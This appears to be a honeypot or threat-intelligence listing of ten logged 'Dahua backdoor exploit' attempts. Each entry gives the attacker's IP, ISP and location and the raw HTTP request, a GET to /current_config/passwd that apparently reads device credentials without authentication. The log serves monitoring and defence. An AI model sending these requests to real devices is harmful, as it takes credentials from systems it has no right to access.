1-10 of 10 results (1 page)
Dahua backdoor exploit
[Attack info]
Attacker:
27.224.137.203
Dest. port: 8080
Time: 06/09/2020 02:37:17
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 CHINANET-BACKBONE
Location: Gansu, Lanzhou
GET /current_config/passwd HTTP/1.1
Host: 176.94.18.109:8080
referer: http://176.94.18.109:8080/
accept-encoding: gzip, deflate
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dahua backdoor exploit
[Attack info]
Attacker:
110.83.33.42
Dest. port: 8080
Time: 02/08/2020 02:35:33
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 CHINANET-BACKBONE
Location: Fujian, Fuzhou
rDNS: 42.33.83.110.broad.fz.fj.dynamic.163data.com.cn
GET /current_config/passwd HTTP/1.1
Host: 102.252.124.187:8080
referer: http://102.252.124.187:8080/
accept-encoding: gzip, deflate
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Dahua backdoor exploit
[Attack info]
Attacker:
36.47.161.124
Dest. port: 80
Time: 11/07/2019 03:19:10
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4134 No.31,Jin-rong Street
Location: Shaanxi, Xincheng
GET /current_config/passwd HTTP/1.1
Host: 140.63.141.60
accept-encoding: identity
Dahua backdoor exploit
[Attack info]
Attacker:
112.80.211.238
Dest. port: 80
Time: 24/01/2019 21:22:43
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Jiangsu, Nanjing
GET /current_config/passwd HTTP/1.1
Host: 38.117.58.8
accept-encoding: identity
Dahua backdoor exploit
[Attack info]
Attacker:
106.47.100.97
Dest. port: 80
Time: 15/08/2018 21:14:22
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS17638 ASN for TIANJIN Provincial Net of CT
Location: Tianjin, Tianjin
GET /current_config/passwd HTTP/1.1
Host: 210.52.25.245
accept-encoding: identity
Dahua backdoor exploit
[Attack info]
Attacker:
106.47.31.243
Dest. port: 80
Time: 25/04/2018 15:51:40
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS17638 ASN for TIANJIN Provincial Net of CT
Location: Tianjin, Tianjin
GET /current_config/passwd HTTP/1.1
Host: 52.182.14.212
accept-encoding: identity
Dahua backdoor exploit
[Attack info]
Attacker:
60.191.38.77
Dest. port: 80
Time: 23/03/2017 08:36:04
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1
accept-encoding: identity
x-request: JSON
Host: 114.255.167.162
Accept: */*
User-Agent: Mozilla/5.0
connection: keep-alive
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Dahua backdoor exploit
[Attack info]
Attacker:
183.129.160.229
Dest. port: 80
Time: 22/03/2017 20:03:09
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1
accept-encoding: identity
x-request: JSON
Host: 114.255.167.162
Accept: */*
User-Agent: Mozilla/5.0
connection: keep-alive
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Dahua backdoor exploit
[Attack info]
Attacker:
60.191.38.77
Dest. port: 80
Time: 22/03/2017 15:05:09
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1
accept-encoding: identity
x-request: JSON
Host: 114.255.167.162
Accept: */*
User-Agent: Mozilla/5.0
connection: keep-alive
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Dahua backdoor exploit
[Attack info]
Attacker:
60.191.38.77
Dest. port: 80
Time: 22/03/2017 11:25:50
Resource(s):
Request: permalink
[Extra info]
No extra information available
GET /current_config/passwd HTTP/1.1
accept-encoding: identity
x-request: JSON
Host: 114.255.167.162
Accept: */*
User-Agent: Mozilla/5.0
connection: keep-alive
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8